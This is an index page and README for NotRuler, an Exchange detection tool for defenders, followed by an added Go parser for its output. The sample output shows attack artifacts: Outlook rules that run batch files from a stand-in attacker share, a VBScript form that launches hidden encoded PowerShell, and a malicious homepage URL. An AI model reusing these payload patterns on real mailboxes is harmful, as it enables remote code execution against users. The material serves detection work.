Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sensepost/notruler
The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.
blue-team security-audit security-tools
- Host: GitHub
- URL: https://github.com/sensepost/notruler
- Owner: sensepost
- License: cc0-1.0
- Created: 2017-09-21T12:35:11.000Z (almost 7 years ago)
- Default Branch: master
- Last Pushed: 2017-10-11T07:15:40.000Z (over 6 years ago)
- Last Synced: 2024-01-24T22:36:59.339Z (5 months ago)
- Topics: blue-team, security-audit, security-tools
- Language: Go
- Size: 27.3 KB
- Stars: 89
- Watchers: 13
- Forks: 18
- Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE
Lists
- awesome-cybersecurity-blueteam - NotRuler - Detect both client-side rules and VBScript enabled forms used by the [Ruler](https://github.com/sensepost/ruler) attack tool when attempting to compromise a Microsoft Exchange server. (Windows-based defenses / Overlay and Virtual Private Networks (VPNs))
- awesome-blueteam - NotRuler - Detect both client-side rules and VBScript enabled forms used by the [Ruler](https://github.com/sensepost/ruler) attack tool when attempting to compromise a Microsoft Exchange server. (Windows-based defenses / Threat signature packages and collections)
- awesome-cybersecurity-blueteam-cn - NotRuler - Detects attempts to compromise a Microsoft Exchange server by detecting both the client-side rules and the VBScript-enabled forms used by the [Ruler](https://github.com/sensepost/ruler) attack tool (Windows-based defenses / Threat hunting)
README
# Introduction
NotRuler is the opposite of [Ruler]. The tool aims to make life a little easier for Exchange Admins by allowing for the detection of both client-side rules and VBScript enabled forms. At a minimum this should allow for the detection of all attacks created through [Ruler].
NotRuler allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol.
## What does it do?
NotRuler can query one or more Exchange mailboxes and detects client-side Outlook rules and VBScript enabled forms.
* Allows Exchange Admins to check for compromise
* Check your own account for compromise
* Extract stager address for Malicious rules
* Extract VBScript used in forms
* Check for 'homepage' and extract URL

# Getting Started
Compiled binaries for Linux, OSX and Windows are available. Find these in [Releases].
Information about setting up Ruler from source is found in the [getting-started guide].

# Usage
NotRuler offers the following modes of operation:
* Rules -- check for client-side rules
* Forms -- check for VBScript enabled forms
* Homepage -- check for a custom homepage

## Rules
The current version of NotRuler can check either a single or multiple mailboxes. These are supplied in the program arguments.
To check multiple mailboxes, create a file with one account per line:
```
[email protected]
[email protected]
[email protected]
[email protected]
```
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
```
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list rules
```
You can also check your own account by using `--self`:
```
./notruler --username [email protected] --mailbox [email protected] --self rules
```
Sample output:
```
[+] Checking [[email protected]]
[+] Found 5 rules
[WARNING] Found client-side rule: [01000000d97851c4:pewpew3] Application: [\\myhost.somewhere.darkside.com\dav\morebad.bat]
[WARNING] Found client-side rule: [01000000d97851b9:pewpew] Application: [\\myhost.somewhere.darkside.com\dav\bad.bat]
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
```

## Forms
Same as with Rules, you need to either have a list of mailboxes or a single mailbox to check. Simply swap "rules" for "forms":
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
```
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list forms
```
You can also check your own account by using `--self`:
```
./notruler --username [email protected] --mailbox [email protected] --self forms
```
Sample output:
```
[+] Checking [[email protected]]
[WARNING] Found form with VBScript! [IPM.Note.badform]
Function P()
CreateObject("Wscript.Shell").Run "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAHgAcABlAGMAVAAxADAAMABDAG8ATgB0AGkATgBVAEUAIA=="
[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
```

## Homepage
And the same again, you need to either have a list of mailboxes or a single mailbox to check.
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
```
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list homepage
```
You can also check your own account by using `--self`:
```
./notruler --username [email protected] --mailbox [email protected] --self homepage
```
Sample output:
```
[+] Checking [[email protected]]
[WARNING] Found endpoint: http://attack.attackpew.com/rce.html
[+] Webview is set as ENABLED
[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
```
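The three modes above all print the same `[+] Checking [...]` / `[WARNING] ...` line format, which is convenient when NotRuler is run across many mailboxes and the output needs to be turned into something a SOC can act on. The following Go program is an added example, not part of the NotRuler project: it parses output in the format shown in the three samples (rules, forms and homepage), attaches each warning to the mailbox being checked, keeps the VBScript body that follows a form warning, and extracts the remote hosts (UNC server names and URL hosts) as a de-duplicated list for hunting in DNS, proxy and SMB logs. The sample output it parses is constructed here with placeholder mailboxes and hosts; `ParseFindings` and `RemoteHosts` are names chosen for this example.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
)

// Finding is one WARNING line from NotRuler output, tied to the mailbox
// that was being checked when it appeared.
type Finding struct {
	Mailbox string
	Kind    string // "rule", "form" or "homepage"
	Name    string // rule id:name, or form message class; empty for homepage
	Target  string // rule application path, form script body, or homepage URL
}

// Line patterns taken from the output format shown in the README samples.
var (
	reChecking = regexp.MustCompile(`^\[\+\] Checking \[(.+)\]$`)
	reRule     = regexp.MustCompile(`^\[WARNING\] Found client-side rule: \[(.+?)\] Application: \[(.+)\]$`)
	reForm     = regexp.MustCompile(`^\[WARNING\] Found form with VBScript! \[(.+)\]$`)
	reHomepage = regexp.MustCompile(`^\[WARNING\] Found endpoint: (\S+)$`)
)

// SampleOutput is constructed for this example; mailboxes and hosts are placeholders.
const SampleOutput = `[+] Checking [alice@example.com]
[+] Found 3 rules
[WARNING] Found client-side rule: [01000000aaaaaaaa:cleanup] Application: [\\fileserver.example.com\share\run.bat]
[+] Checking [bob@example.com]
[WARNING] Found form with VBScript! [IPM.Note.badform]
Function P()
MsgBox "constructed sample body"
End Function
[+] Checking [carol@example.com]
[WARNING] Found endpoint: http://example.invalid/page.html
[+] Webview is set as ENABLED
[+] Checking [dave@example.com]
[+] No Rules Found
`

// ParseFindings walks NotRuler output line by line. Status lines start with
// "["; any other non-empty line directly after a form warning is part of the
// dumped VBScript and is appended to that finding's Target.
func ParseFindings(output string) []Finding {
	var findings []Finding
	mailbox := ""
	sc := bufio.NewScanner(strings.NewReader(output))
	for sc.Scan() {
		line := strings.TrimRight(sc.Text(), "\r")
		switch {
		case reChecking.MatchString(line):
			mailbox = reChecking.FindStringSubmatch(line)[1]
		case reRule.MatchString(line):
			m := reRule.FindStringSubmatch(line)
			findings = append(findings, Finding{Mailbox: mailbox, Kind: "rule", Name: m[1], Target: m[2]})
		case reForm.MatchString(line):
			m := reForm.FindStringSubmatch(line)
			findings = append(findings, Finding{Mailbox: mailbox, Kind: "form", Name: m[1]})
		case reHomepage.MatchString(line):
			m := reHomepage.FindStringSubmatch(line)
			findings = append(findings, Finding{Mailbox: mailbox, Kind: "homepage", Target: m[1]})
		case line != "" && !strings.HasPrefix(line, "[") && len(findings) > 0 && findings[len(findings)-1].Kind == "form":
			f := &findings[len(findings)-1]
			if f.Target != "" {
				f.Target += "\n"
			}
			f.Target += line
		}
	}
	return findings
}

// RemoteHosts returns the sorted, de-duplicated hosts the findings point at:
// the server name of a UNC path in a rule action, or the host of a homepage
// URL. Form bodies are skipped because their contents need manual review.
func RemoteHosts(findings []Finding) []string {
	seen := map[string]bool{}
	for _, f := range findings {
		host := ""
		switch {
		case strings.HasPrefix(f.Target, `\\`):
			host = strings.SplitN(strings.TrimPrefix(f.Target, `\\`), `\`, 2)[0]
		case strings.HasPrefix(f.Target, "http://"), strings.HasPrefix(f.Target, "https://"):
			if u, err := url.Parse(f.Target); err == nil {
				host = u.Hostname()
			}
		}
		if host != "" {
			seen[strings.ToLower(host)] = true
		}
	}
	hosts := make([]string, 0, len(seen))
	for h := range seen {
		hosts = append(hosts, h)
	}
	sort.Strings(hosts)
	return hosts
}

func main() {
	findings := ParseFindings(SampleOutput)
	for _, f := range findings {
		fmt.Printf("%-20s %-9s %-28s %s\n", f.Mailbox, f.Kind, f.Name, strings.ReplaceAll(f.Target, "\n", " | "))
	}
	fmt.Println("hosts to hunt for:", RemoteHosts(findings))
}
```

In practice the program would read the saved NotRuler output from a file or stdin instead of the embedded constant; the parsing is deliberately line-oriented so it also works on output that was captured across several runs and concatenated.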
# IOCs
I've added a list of IOCs here: [iocs.md](https://github.com/sensepost/notruler/blob/master/iocs.md)
Feel free to submit Issues/PRs with further IOCs!
# License
[![License: CC BY-NC-SA 4.0](https://img.shields.io/badge/License-CC%20BY--NC--SA%204.0-lightgrey.svg)](http://creativecommons.org/licenses/by-nc-sa/4.0/)

NotRuler is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/). Permissions beyond the scope of this license may be available at http://sensepost.com/contact/.
[Ruler]: https://github.com/sensepost/ruler
[Releases]: